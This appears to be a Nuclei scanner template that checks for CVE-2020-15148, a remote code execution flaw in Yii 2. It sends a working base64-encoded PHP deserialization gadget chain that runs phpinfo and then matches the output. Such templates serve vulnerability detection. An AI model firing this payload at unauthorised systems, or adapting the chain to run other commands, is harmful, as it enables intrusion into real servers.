nuclei-templates/cves/2020/CVE-2020-15148.yaml

id: CVE-2020-15148

info:
  name: Yii 2 (yiisoft/yii2) RCE
  author: pikpikcu
  severity: high
  reference: https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
  tags: cve,cve2020,rce,yii

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
          - "PHP License"
          - "PHP Variables"
        condition: and

      - type: status
        status:
          - 200